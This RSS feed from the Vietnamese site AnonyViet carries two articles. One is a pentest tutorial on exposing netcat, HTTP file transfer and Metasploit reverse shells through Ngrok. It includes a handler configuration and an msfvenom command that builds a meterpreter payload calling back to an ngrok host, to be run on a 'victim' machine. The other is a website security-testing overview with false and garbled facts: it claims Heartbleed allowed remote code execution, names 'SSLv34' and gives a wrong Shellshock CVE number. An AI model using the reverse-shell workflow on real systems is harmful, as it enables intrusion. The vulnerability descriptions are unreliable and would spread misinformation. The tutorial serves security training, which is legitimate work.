<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>pentester &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/tag/pentester/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Thu, 24 Jul 2025 16:55:22 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>pentester &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Cách cấu hình Ngrok để NAT Port trên Kali Linux</title>
		<link>https://anonyviet.com/cach-cau-hinh-ngrok-de-nat-port-tren-kali-linux/</link>
					<comments>https://anonyviet.com/cach-cau-hinh-ngrok-de-nat-port-tren-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Tue, 26 Jul 2022 00:31:14 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[kali linux]]></category>
		<category><![CDATA[nat port]]></category>
		<category><![CDATA[Ngrok]]></category>
		<category><![CDATA[pentester]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=42437</guid>

					<description><![CDATA[Ngrok là một công cụ giúp bạn đưa các dịch vụ trên máy tính ra ngoài Internet mà không cần phải NAT Port hoặc làm lộ IP Public của bạn. Ngrok là một trong những công cụ yêu thích của mình và trong bài viết này, mình sẽ chỉ cho các bạn một số cách [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Ngrok là một công cụ giúp bạn đưa các dịch vụ trên máy tính ra ngoài Internet mà không cần phải NAT Port hoặc làm lộ IP Public của bạn. Ngrok là một trong những công cụ yêu thích của mình và trong bài viết này, mình sẽ chỉ cho các bạn một số cách mà mình đã sử dụng Ngrok trong quá trình Pentest.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/1_IalYktr6TJArYDKZm2Wwbw.jpg" alt="Thiết lập Ngrok cho Pentester" width="700" height="334" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 22"></p>
<h2>Cấu hình Ngrok</h2>
<p>Để sử dụng Ngrok, bạn cần có tài khoản. Truy cập <a href="https://ngrok.com/" target="_blank" rel="noopener">https://ngrok.com/</a> và tạo tài khoản bằng email hoặc sử dụng tùy chọn Google | Github Oauth. Tiếp theo, tải xuống tệp cài đặt Ngrok bằng cách truy cập <strong class="lg je">Setup &amp; Installation</strong>, sau đó nhấp chuột phải vào tùy chọn <strong class="lg je">Download for Linux</strong> và sao chép địa chỉ liên kết:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_qdMVJ0T3nCymsaUXaFBgoA.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 21" width="700" height="198" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 23"></p>
<p>Tiếp theo, vào Terminal của máy tấn công và <code class="fr vn vo vp vq b">wget</code> tệp ZIP Ngrok. Sau đó giải nén, thêm quyền thực thi và cuối cùng di chuyển tệp Ngrok sang /usr/local/bin/:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">cd /tmp
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
chmod +x ngrok
sudo mv ngrok /usr/local/bin/</pre>
<p>LƯU Ý: Liên kết trên có khả năng không hoạt động với bạn. Sử dụng liên kết bạn đã sao chép từ trang chủ Ngrok.</p>
<h2>Cấu hình AuthToken</h2>
<p>Bây giờ bạn đã cài đặt xong Ngrok, chúng ta cần cung cấp cho Ngrok mã xác thực (authentication token) được cung cấp trong web của Ngrok. Truy cập tab Your Authtoken từ trong tài khoản của bạn:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_4DUxrC7y9oEGJEnd0BWvzQ.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 22" width="509" height="520" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 24"></p>
<p>Và sau đó sao chép Authtoken:<img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_oMZs3kAX5A__uMX-tSfeJA.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 23" width="700" height="219" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 25"></p>
<p>Cuối cùng, hãy chạy lệnh sau để định cấu hình Ngrok sử dụng Authtoken này:</p>
<p><code>ngrok authtoken 'AUTHTOKEN_GOES_HERE'</code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_-acgP8dDF883Xs9I7wlgWw-1.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 24" width="657" height="137" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 26"></p>
<h2>Các trường hợp sử dụng Ngrok cho Pentester trên Kali Linux</h2>
<p>Dưới đây là một số trường hợp sử dụng Ngrok trong quá trình Pentest.</p>
<h3>Truyền tệp bằng Netcat</h3>
<p>Chuyển các tệp sang một máy không nằm trong mạng nội bộ của bạn là không thể nhưng cho đến khi bạn biết đến Ngrok. Để cung cấp dịch vụ Netcat qua Internet với Ngrok, hãy thực hiện các bước sau:</p>
<p>1. Thiết lập trình nghe Netcat trên một cổng bạn chọn</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_aeUemux-v2MtNZVdseWZCw.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 25" width="569" height="143" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 27"></p>
<p>2. Chạy Ngrok bằng lệnh tcp và chỉ định cổng bạn đã sử dụng để khởi động Netcat</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_WeOzkxNWKNGd9KlstEkZog.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 26" width="608" height="305" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 28"></p>
<p>Sau khi nhấn enter, trang tổng quan trạng thái phiên của Ngrok sẽ xuất hiện từ đó bạn có thể lấy URL:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 27" width="700" height="233" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 29"></p>
<p>3. Trên máy đích, sử dụng URI do Ngrok cung cấp để truyền tệp bằng Netcat. Lưu ý rằng URI tcp:// không được sử dụng khi chỉ định URL cho Netcat. Và đừng quên xóa: và thay thế bằng dấu cách:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_TU1Y5aIP0N8fFwAFK9E0kA.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 28" width="700" height="186" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 30"></p>
<h3>Truyền File bằng máy chủ HTTP</h3>
<p>Đôi khi bạn muốn chuyển tệp bằng các máy chủ HTTP đơn giản như mô-đun http.server của Python. Để chuyển tệp từ máy cục bộ của bạn qua Internet bằng máy chủ HTTP được lưu trữ cục bộ, hãy thực hiện các bước sau:</p>
<p>1. Khởi động máy chủ HTTP trên cổng bạn muốn</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_wocVC6oaMb_5Eh8gDLeSxg.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 29" width="620" height="129" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 31"></p>
<p>2. Chạy Ngrok bằng lệnh http và chỉ định cổng bạn đã sử dụng để khởi động máy chủ HTTP trên</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_R-9YcwCS4HVuwjPPFZJRHg.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 30" width="556" height="187" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 32"></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw-1.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 31" width="700" height="233" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 33"></p>
<p>3. Trên máy đích, sử dụng URI do Ngrok cung cấp để tải tệp</p>
<p><code>curl -o file.txt a96c-73-30-177-39.ngrok.io/file.txt</code></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_BsT7SkPgaoFdBz7vsIH4Ow.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 32" width="700" height="223" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 34"></p>
<h3>Metasploit Reverse Shells qua Internet</h3>
<p>Việc tạo tải trọng Msfvenom với địa chỉ IP cục bộ sẽ hạn chế bạn bằng cách chỉ cho phép bạn tạo tải trọng cho các máy cục bộ. Để tạo tải trọng cho một máy từ xa kết nối lại qua Internet với Metasploit cục bộ của bạn, hãy thực hiện các bước sau:</p>
<p>1. Chạy Ngrok và chỉ định cổng cục bộ mà trình xử lý sẽ lắng nghe</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_G-XPoybeL8Yi2I2ANgGalw.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 33" width="505" height="160" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 35"></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_5qiL_LG-xh9BmtpoAcz4ig.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 34" width="700" height="249" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 36"></p>
<p>2. Khởi động trình xử lý Metasploit và định cấu hình các tùy chọn ReverseListenerBindAddress và ReverseListenerBindPort để khi kết nối, chúng sẽ chuyển tiếp lưu lượng đến localhost:4444:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">use exploit/multi/handler
set lhost 6.tcp.ngrok.io
set lport 16737
set payload linux/x64/meterpreter/reverse_tcp
set ReverseListenerBindAddress 127.0.0.1
set ReverseListenerBindPort 4444
run -j</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_AxFNPvYUqR1fPbeLhbcszg.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 35" width="700" height="307" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 37"></p>
<p>3. Tạo tải trọng Msfvenom và chỉ định URI do Ngrok cung cấp làm tham số LHOST</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o revsh LHOST=6.tcp.ngrok.io LPORT=16737</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_WJRE9H4AIde2zBlCfR54BA.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 36" width="700" height="173" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 38"></p>
<p>4. Chuyển tệp sang máy nạn nhân và sau đó chạy tải trọng. Bạn sẽ nhận được kết nối trở lại trên trình xử lý Metasploit cục bộ của mình:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_gO8djRojWtcRNOjwQJnmIQ.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 37" width="700" height="287" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 39"></p>
<p>LƯU Ý: Hãy cẩn thận khi sử dụng Ngrok cho các reverse shell. Nếu không được xử lý, bạn có thể vô tình để lộ mạng của khách hàng trước những kẻ xấu.</p>
<h3>Kiểm tra lỗi hổng tương tác dịch vụ</h3>
<p>Kiểm tra các tương tác máy chủ bên ngoài như giả mạo yêu cầu phía máy chủ (SSRF) có thể nhanh chóng thực hiện bằng cách sử dụng Ngrok. Chỉ cần tạo một trình nghe Ngrok trên bất kỳ cổng nào bạn muốn và sau đó sử dụng URL được cung cấp để đưa vào các thông số có khả năng dễ bị tấn công như tiêu đề HTTP, thông số chuyển hướng URL,&#8230; để cố gắng tìm lỗ hổng tương tác dịch vụ OOD:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_YkXhda9Dcpn2JS_UN4EA_Q.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 38" width="475" height="148" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 40"></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_K2FJLlzoJsysGX6f3tlICg.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 39" width="700" height="210" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 41"></p>
<p>Sau đó, chúng ta có thể mô phỏng một dịch vụ OOB với cURL:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_GYV7NOzVnlZ9XIDaFAxe1g.jpg" alt="Cách cấu hình Ngrok để NAT Port trên Kali Linux 40" width="700" height="460" title="Cách cấu hình Ngrok để NAT Port trên Kali Linux 42"></p>
<p>Như bạn  có thể thấy, một số yêu cầu GET đã được gửi đến trình nghe Ngrok, có thể được sử dụng để xác nhận các lỗ hổng như SSRF.</p>
<p>Ngoài ra, bạn cũng có thể sử dụng RAT mà không cần mở Port bằng Ngrok <a href="https://anonyviet.com/dung-rat-khong-can-mo-port/">tại đây</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Ngrok là gì và tại sao nó hữu ích cho Pentest?</h3>
<p>Ngrok là một công cụ tạo đường hầm HTTP/TCP, cho phép bạn tiếp cận các dịch vụ trên máy tính cá nhân của mình từ Internet mà không cần phải cấu hình NAT port phức tạp hoặc tiết lộ địa chỉ IP công cộng.  Điều này rất hữu ích trong Pentest để dễ dàng kiểm tra các ứng dụng từ xa.</p>
<h3>Tôi cần làm gì sau khi cài đặt Ngrok?</h3>
<p>Sau khi cài đặt, bạn cần xác thực tài khoản Ngrok của mình bằng Authtoken.  Bạn có thể lấy Authtoken từ trang cá nhân trên website Ngrok và sử dụng lệnh  <code>ngrok authtoken 'YOUR_AUTHTOKEN'</code> để cấu hình.</p>
<h3>Ngrok có an toàn không khi sử dụng cho reverse shell?</h3>
<p>Cần thận trọng khi sử dụng Ngrok cho reverse shell vì nó có thể làm lộ mạng của khách hàng nếu không được xử lý cẩn thận.  Hãy đảm bảo tuân thủ các nguyên tắc bảo mật và chỉ sử dụng trên các hệ thống mà bạn có quyền truy cập hợp pháp.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-cau-hinh-ngrok-de-nat-port-tren-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kinh nghiệm khi Kiểm tra bảo mật Website</title>
		<link>https://anonyviet.com/kinh-nghiem-khi-kiem-tra-bao-mat-website/</link>
					<comments>https://anonyviet.com/kinh-nghiem-khi-kiem-tra-bao-mat-website/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 09 May 2022 05:54:13 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[bảo mật website]]></category>
		<category><![CDATA[khai thác lỗ hổng bảo mật]]></category>
		<category><![CDATA[kiểm thử xâm nhập]]></category>
		<category><![CDATA[kiểm tra bảo mật]]></category>
		<category><![CDATA[lỗ hổng bảo mật]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentester]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=41444</guid>

					<description><![CDATA[Khi nói đến bảo mật Website, chúng ta sẽ nghĩ đến các chuyên gia Pentester hay White Hat. Hacker ngày càng có kỹ năng cao hơn và việc chúng nhắm mục tiêu đến Website của bạn chỉ là vấn đề thời gian. Đó là lý do tại sao việc kiểm tra bảo mật Website thường [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Khi nói đến bảo mật Website, chúng ta sẽ nghĩ đến các chuyên gia Pentester hay White Hat. Hacker ngày càng có kỹ năng cao hơn và việc chúng nhắm mục tiêu đến Website của bạn chỉ là vấn đề thời gian. Đó là lý do tại sao việc kiểm tra bảo mật Website thường xuyên là rất quan trọng để đảm bảo rằng nó an toàn nhất có thể. Trong bài viết này, chúng ta sẽ nói về tầm quan trọng của việc kiểm tra bảo mật Website và cách thực hiện. Mình cũng sẽ giới thiệu một số lỗ hổng bảo mật nguy hiểm đã được tìm thấy trong các Website trong những năm qua và những công ty nào cung cấp dịch vụ kiểm tra bảo mật Website tốt nhất.</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/05/kinh-nghiem-khi-kiem-tra-bao-mat-website-1-1-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/05/kinh-nghiem-khi-kiem-tra-bao-mat-website-1-1-1.jpg" alt="kinh nghiem khi kiem tra bao mat website " width="523" height="362" title="Kinh nghiệm khi Kiểm tra bảo mật Website 44"></a></p>
<h2>Kiểm tra bảo mật Website là gì và các tính năng của nó là gì?</h2>
<p>Mục tiêu của kiểm tra bảo mật Website là để đánh giá tính bảo mật của một Website hoặc ứng dụng web. Đánh giá bảo mật Website có thể được sử dụng để xác định các lỗ hổng trong hệ thống và xác định liệu kẻ tấn công có thể khai thác các lỗ hổng đó để truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác hay không. Kiểm tra thâm nhập, kiểm tra mã và quét lỗ hổng bảo mật là ba trong số các quy trình kiểm tra bảo mật Website phổ biến nhất.</p>
<ul>
<li><a href="https://www.getastra.com/blog/security-audit/penetration-testing/" target="_blank" rel="noopener"><strong>Kiểm tra thâm nhập</strong></a> (còn được gọi là &#8220;Pentest&#8221;) là một trong những đánh giá bảo mật ứng dụng web được thực hiện thường xuyên nhất. Chúng liên quan đến việc sử dụng các công cụ tự động hoặc các kỹ thuật thủ công để cố gắng khai thác các điểm yếu trong hệ thống. Nếu thành công, điều này có thể cung cấp cho kẻ tấn công toàn quyền kiểm soát hệ thống và cho phép chúng truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác.</li>
<li><strong>Code reviews</strong> &#8211; đây là loại kiểm tra theo dạng White box, bạn đang cung cấp đầy đủ mã nguồn của Website để kiểm tra xem Code có lỗ hổng nào không. Đây là một loại kiểm tra thâm nhập yêu cầu kiểm tra thủ công mã nguồn của hệ thống để tìm các sai sót. Nó có thể tốn thời gian, nhưng nó thường đáng giá cao vì việc xem xét mã có thể phát hiện ra những sai sót mà các loại kiểm tra khác sẽ bỏ sót.</li>
<li><strong>Quét lỗ hổng bảo mật</strong> là một loại kiểm tra bảo mật Website phổ biến khác. Chúng liên quan đến việc sử dụng các công cụ tự động để quét hệ thống tìm các lỗ hổng đã biết. Đây thường là một cách nhanh chóng và dễ dàng để tìm ra các điểm yếu tiềm ẩn trong hệ thống, nhưng điều quan trọng cần lưu ý là không phải tất cả các lỗ hổng đều được máy quét lỗ hổng tìm thấy.</li>
</ul>
<h2>Tại sao Kiểm tra Bảo mật Website lại quan trọng?</h2>
<p>Điều quan trọng là phải tiến hành kiểm tra bảo mật Website vì nó giúp bạn phát hiện ra các lỗ hổng trong hệ thống của mình trước khi kẻ tấn công thực hiện. Bằng cách phát hiện và sửa chữa những lỗ hổng này, bạn có thể làm cho Website an toàn hơn trước Hacker. Ngoài ra, kiểm tra bảo mật Website cũng có thể giúp bạn đáp ứng các yêu cầu tuân thủ, chẳng hạn như các yêu cầu do Ngành thẻ thanh toán (PCI) đặt ra cho các Website xử lý thanh toán bằng thẻ tín dụng.</p>
<h2>Điều gì xảy ra nếu Kiểm tra Bảo mật Website không được thực hiện thường xuyên</h2>
<p>Nếu kiểm tra bảo mật Website không được thực hiện, thì rất có thể các lỗ hổng sẽ không được chú ý và chưa được vá. Điều này có nghĩa là những kẻ tấn công sẽ có thời gian dễ dàng hơn khi khai thác những điểm yếu này và giành quyền truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác. Ngoài ra, nếu kiểm tra bảo mật Website không được thực hiện thường xuyên, thì các lỗ hổng bảo mật mới có thể xuất hiện theo thời gian khi các tính năng mới được thêm vào hệ thống hoặc phần mềm mới được cài đặt.</p>
<h2>Cách kiểm tra bảo mật Website &#8211; Các bước:</h2>
<p>Bây giờ chúng ta đã xem xét kiểm tra bảo mật Website là gì và tại sao nó lại quan trọng, hãy cùng xem <a href="https://www.getastra.com/blog/security-audit/web-application-security-testing/" target="_blank" rel="noopener">cách kiểm tra bảo mật Website</a>. Nói chung, có bốn bước mà bạn sẽ cần làm theo:</p>
<p>Bây giờ chúng ta đã xem xét kiểm tra bảo mật Website là gì và tại sao nó lại quan trọng, hãy cùng xem cách kiểm tra bảo mật Website. Nói chung, có bốn bước mà bạn sẽ cần làm theo:</p>
<h3>Lập kế hoạch kiểm tra</h3>
<p>Bước đầu tiên trong kiểm tra bảo mật Website là lập kế hoạch kiểm tra của bạn. Điều này liên quan đến việc quyết định loại thử nghiệm bạn muốn chạy, phạm vi bạn muốn thử nghiệm và những tài nguyên nào bạn sẽ cần.</p>
<p>Có một số loại kiểm tra bảo mật Website khác nhau, mặc dù những loại kiểm tra thường xuyên nhất bao gồm kiểm tra thâm nhập, đánh giá mã (review code) và quét lỗ hổng bảo mật. Bạn cũng sẽ cần chọn một phạm vi cho thử nghiệm của mình. Điều này có nghĩa là quyết định hệ thống và ứng dụng nào bạn muốn kiểm tra và những hệ thống và ứng dụng nào bạn muốn loại trừ.</p>
<p>Cuối cùng, bạn sẽ cần thu thập các tài nguyên cần thiết cho bài kiểm tra của mình. Điều này bao gồm những thứ như công cụ kiểm tra, tài liệu và bất kỳ tài liệu cần thiết nào khác.</p>
<h3>Chuẩn bị</h3>
<p>Giai đoạn tiếp theo là chuẩn bị cho việc kiểm tra của bạn như thiết lập môi trường thử nghiệm và đảm bảo tất cả các công cụ và tài liệu cần thiết đều có sẵn.</p>
<p>Để bắt đầu, bạn cần xây dựng thiết lập thử nghiệm của mình như một môi trường thử nghiệm riêng biệt bị ngắt kết nối với môi trường thật. Điều này rất quan trọng vì nó đảm bảo rằng bất kỳ thay đổi hoặc sửa đổi nào được thực hiện trong quá trình thử nghiệm không ảnh hưởng đến các hệ thống đang hoạt động.</p>
<p>Do đó, bạn sẽ cần thu thập các thiết bị và thủ tục giấy tờ cần thiết. Điều này bao gồm những thứ như công cụ thử nghiệm, trường hợp thử nghiệm và bất kỳ tài liệu liên quan nào khác.</p>
<p>Cuối cùng, bạn sẽ cần phải lập một kế hoạch kiểm tra cùng nhau. Tài liệu này phải phác thảo các mục tiêu của thử nghiệm, phạm vi thử nghiệm và các nguồn lực mà bạn sẽ cần.</p>
<h3>Kiểm tra hệ thống</h3>
<p>Khi mọi thứ đã chuẩn bị xong, bạn có thể bắt đầu thực hiện các bài kiểm tra của mình. Điều này liên quan đến việc chạy bài test hệ thống đã chọn và ghi lại kết quả.</p>
<p>Có nhiều loại kiểm tra bảo mật Website khác nhau, nhưng kiểm tra thâm nhập, đánh giá mã và quét lỗ hổng bảo mật là những loại phổ biến nhất.</p>
<p>Các bài kiểm tra thâm nhập được sử dụng để mô phỏng các cuộc tấn công trong thế giới thực và xác định các lỗ hổng có thể bị khai thác bởi những kẻ tấn công.</p>
<p>Đánh giá mã được sử dụng để kiểm tra mã nguồn của các ứng dụng và xác định các điểm yếu tiềm ẩn về bảo mật.</p>
<p>Quét lỗ hổng bảo mật được sử dụng để quét các hệ thống và ứng dụng để tìm các lỗ hổng đã biết.</p>
<h4>Báo cáo</h4>
<p>Cuối cùng, bạn sẽ cần báo cáo về những phát hiện của mình. Điều này liên quan đến việc viết một báo cáo về những phát hiện của bạn và trình bày nó cho các bên liên quan có liên quan.</p>
<p>Báo cáo của bạn nên bao gồm bản tóm tắt các phát hiện của bạn, cũng như chi tiết về bất kỳ lỗ hổng bảo mật nào đã được xác định. Điều quan trọng cần lưu ý là không phải tất cả các lỗ hổng đều nghiêm trọng và bạn nên ưu tiên chúng dựa trên mức độ nghiêm trọng của chúng.</p>
<p>Bạn cũng nên bao gồm các khuyến nghị để khắc phục, là các hành động có thể được thực hiện để giải quyết các lỗ hổng bảo mật đã được xác định.</p>
<h2>Một số lỗ hổng chính được tìm thấy thông qua kiểm tra bảo mật Website là gì?</h2>
<p>Đã có nhiều lỗ hổng chính được tìm thấy thông qua kiểm tra bảo mật Website trong những năm qua. Một số trong những cái đáng chú ý nhất bao gồm:</p>
<p>&#8211; <strong>Heartbleed (CVE-2014-0160)</strong>: Đây là một lỗ hổng nghiêm trọng trong thư viện phần mềm OpenSSL đã ảnh hưởng đến nhiều Website và ứng dụng web. Nó cho phép những kẻ tấn công thực thi mã từ xa trên các hệ thống đang chạy các phiên bản OpenSSL dễ bị tấn công.</p>
<p>&#8211; <strong>Poodle (CVE-2014-3566)</strong>: Đây là một lỗ hổng nghiêm trọng trong SSLv34 đã ảnh hưởng đến nhiều Website và ứng dụng web. Nó cho phép những kẻ tấn công giải mã từ xa lưu lượng được cho là được mã hóa bởi SSLv34.</p>
<p>&#8211; <strong>Shellshock (CVE-2014-2716)</strong>: Đây là một lỗ hổng nghiêm trọng trong Bash shell ảnh hưởng đến nhiều Website và ứng dụng web.</p>
<p>&#8211; <strong>GHOST (CVE-2015-0235)</strong>: Đây là một lỗ hổng nghiêm trọng trong thư viện glibc đã ảnh hưởng đến nhiều Website và ứng dụng web.</p>
<h2>Công ty nào cung cấp thử nghiệm bảo mật Website?</h2>
<p>Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website. Một số công ty nổi tiếng như:</p>
<ul>
<li>WhiteHat Security: WhiteHat Security là nhà cung cấp dịch vụ kiểm tra bảo mật Website hàng đầu.</li>
<li>Astra&#8217;s Pentest: Astra&#8217;s Pentest là một nhà cung cấp dịch vụ kiểm tra bảo mật Website phổ biến khác. Họ cung cấp cả thử nghiệm tự động và thủ công, cũng như thử nghiệm thâm nhập mạng và thiết bị di động với mức giá khá hợp lý.</li>
<li>RapidScan: RapidScan là nhà cung cấp hàng đầu các dịch vụ kiểm tra bảo mật Website tự động. Các chuyên gia bảo mật thực hiện kiểm tra kỹ lưỡng lỗ hổng bảo mật, tích hợp tường lửa ứng dụng web an toàn, v.v.</li>
<li>Nessus: Nessus là nhà cung cấp dịch vụ quét lỗ hổng bảo mật phổ biến. Kiểm tra thâm nhập dựa trên web và đánh giá bảo mật có sẵn.</li>
<li>Veracode: Một nhà cung cấp dịch vụ kiểm tra bảo mật Website nổi bật khác là Veracode. Họ cung cấp cả xác minh tĩnh và động.</li>
<li>Qualys: Qualys là nhà cung cấp hàng đầu về các giải pháp quản lý lỗ hổng bảo mật và tuân thủ. Họ cung cấp nhiều loại sản phẩm, bao gồm quét ứng dụng web, có thể được sử dụng để kiểm tra các lỗ hổng trong các Website và ứng dụng web.</li>
</ul>
<h2>Các tính năng hàng đầu của các công ty kiểm tra bảo mật Website là gì?</h2>
<p>Khi chọn một công ty kiểm tra bảo mật Website, bạn cần lưu ý các vấn đề sau:</p>
<ul>
<li>Kiểm tra tự động hoặc thủ công: Một số công ty chỉ cung cấp kiểm tra tự động, trong khi những công ty khác cũng cung cấp kiểm tra thủ công.</li>
<li>Thử nghiệm tĩnh hoặc động: Một số công ty chỉ cung cấp thử nghiệm tĩnh, trong khi những công ty khác cũng cung cấp thử nghiệm động.</li>
<li>Dịch vụ bảo mật đa dạng: Một số công ty chỉ cung cấp thử nghiệm bảo mật Website, trong khi những công ty khác cũng cung cấp một loạt các dịch vụ bảo mật khác. Nếu bạn muốn được bảo vệ toàn diện nhất có thể, thì bạn nên chọn một công ty cung cấp nhiều dịch vụ bảo vệ.</li>
</ul>
<p>Bạn có thể chắc chắn thuê doanh nghiệp kiểm tra bảo mật Website tốt nhất cho nhu cầu của mình nếu bạn ghi nhớ những đặc điểm này.</p>
<h2>Lời kết</h2>
<p>Kiểm tra bảo mật Website của bạn là điều quan trọng để đảm bảo an toàn cho dữ liệu của bạn và dữ liệu của người dùng. Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website, vì vậy hãy đảm bảo chọn một công ty cung cấp các tính năng bạn cần.</p>
